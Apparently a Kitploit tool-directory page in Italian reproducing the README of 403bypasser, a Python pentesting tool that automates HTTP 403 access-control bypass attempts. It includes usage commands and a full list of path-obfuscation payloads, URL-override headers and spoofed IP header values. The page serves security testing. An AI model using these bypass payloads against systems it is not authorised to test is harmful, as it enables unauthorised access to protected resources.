Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
403bypasser — Automatizza le tecniche di bypass del controllo di accesso HTTP 403 utilizzando manipolazione degli header, offuscamento del percorso e conversione del metodo HTTP per il test di sicurezza delle applicazioni web. | Kitploit
Strumenti/GitHubGitHub/yunemse48/403bypasser
Evasione IDS/IPSRaccolta InformazioniBypass WAFSicurezza WebPenetration Testing
GitHubyunemse48/403bypasser

403bypasser

Automatizza le tecniche di bypass del controllo di accesso HTTP 403 utilizzando manipolazione degli header, offuscamento del percorso e conversione del metodo HTTP per il test di sicurezza delle applicazioni web.

Vedi Repository
957163775 anni faRevisionato da Kitploit

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

forthebadge made-with-python License: MIT

403bypasser

Banner

Turco

403bypasser automatizza le tecniche utilizzate per aggirare le restrizioni di controllo degli accessi sulle pagine di destinazione. Questo strumento continuerà ad essere sviluppato ed è aperto ai contributi.

Inglese

403bypasser automatizza le tecniche utilizzate per aggirare le restrizioni di controllo degli accessi sulle pagine di destinazione. 403bypasser continuerà ad essere migliorato ed è aperto ai contributi.

Installazione

  1. Clona il repository sulla tua macchina. git clone https://github.com/yunemse48/403bypasser.git
  2. Installa i moduli necessari eseguendo il comando pip install -r requirements.txt
  • PRONTO!
  • Utilizzo

    Argomenti:

    ArgomentoDescrizioneEsempiNota
    -usingolo URL da scansionarehttp://example.com o http://example.com/Tutti questi esempi di utilizzo sono interpretati allo stesso modo
    -Upercorso di un elenco di URL./urllist.txt, ../../urllist.txt, ecc.Basta fornire il percorso in cui si trova il file :)
    -dsingola directory da scansionareadmin o /admin o admin/ o /admin/Tutti questi esempi di utilizzo sono interpretati allo stesso modo
    -Dpercorso di un elenco di directory./dirlist.txt, ../../dirlist.txt, ecc.Basta fornire il percorso in cui si trova il file :)

    Utilizzo 1: python3 403bypasser.py -u https://example.com -d /secret
    Utilizzo 2: python3 403bypasser.py -u https://example.com -D dirlist.txt
    Utilizzo 3: python3 403bypasser.py -U urllist.txt -d /secret
    Utilizzo 4: python3 403bypasser.py -U urllist.txt -D dirlist.txt

    NOTA IMPORTANTE: Tutti i seguenti sono interpretati allo stesso modo. Pertanto, quale pattern usare è solo una questione di preferenza.

    • python3 403bypasser.py -u https://example.com -d secret
    • python3 403bypasser.py -u https://example.com -d /secret
    • python3 403bypasser.py -u https://example.com -d /secret/
    • python3 403bypasser.py -u https://example.com -d secret/
    • python3 403bypasser.py -u https://example.com/ -d secret
      TUTTI UGUALI!

    Poiché Python è un linguaggio multipiattaforma, è possibile eseguire questo programma su diversi sistemi operativi.

    Output

    L'output del programma viene salvato (nella directory corrente) in un file con il nome del dominio fornito come input.
    Ad esempio:
    Viene dato python3 403bypasser.py -u https://example.com -d /secret. Quindi l'output viene salvato in example.txt nella directory corrente.


    Note di rilascio

    Modifiche in v2.0: Sono state apportate modifiche considerevoli in questa versione. Il progetto è stato completamente spostato da Bash a Python 3. Sono state aggiunte tecniche nuove e di vario tipo.

    Modifiche in v1.1: Ora è possibile passare file (elenchi) a 403bypasser come input tramite argomenti. Inoltre, sono stati aggiunti due casi di test: avvelenamento con gli header 1) X-Original-URL e 2) X-Rewrite-URL.


    Lista delle cose da fare

    • GUI
    • Aggiungere opzione Rate-Limit / Threads
    • Aggiungere un'opzione per i tipi di scansione (veloce, normale, aggressiva o solo manipolazione del percorso / header)
    • Esportare il comando cURL per ogni richiesta
    • Aggiungere parametri per salvare l'output in base ai codici di stato HTTP
    • Aggiungere parametri per salvare l'output in base alle anomalie delle dimensioni delle pagine

    Quali casi controlla questo strumento?

    1. Manipolazione del metodo di richiesta

    • Converti richiesta GET in richiesta POST

    2. Manipolazione del percorso

    • /%2e/secret
    • /secret/
    • /secret..;/
    • /secret/..;/
    • /secret%20
    • /secret%09
    • /secret%00
    • /secret.json
    • /secret.css
    • /secret.html
    • /secret?
    • /secret??
    • /secret???
    • /secret?testparam
    • /secret#
    • /secret#test
    • /secret/.
    • //secret//
    • /./secret/./

    3. Sovrascrittura dell'URL di destinazione tramite header non standard

    • X-Original-URL: /secret
    • X-Rewrite-URL: /secret

    4. Altri header e valori

    Header:

    • X-Custom-IP-Authorization
    • X-Forwarded-For
    • X-Forward-For
    • X-Remote-IP
    • X-Originating-IP
    • X-Remote-Addr
    • X-Client-IP
    • X-Real-IP

    Valori:

    • localhost
    • localhost:80
    • localhost:443
    • 127.0.0.1
    • 127.0.0.1:80
    • 127.0.0.1:443
    • 2130706433
    • 0x7F000001
    • 0177.0000.0000.0001
    • 0
    • 127.1
    • 10.0.0.0
    • 10.0.0.1
    • 172.16.0.0
    • 172.16.0.1
    • 192.168.1.0
    • 192.168.1.1
    Scarica lo strumento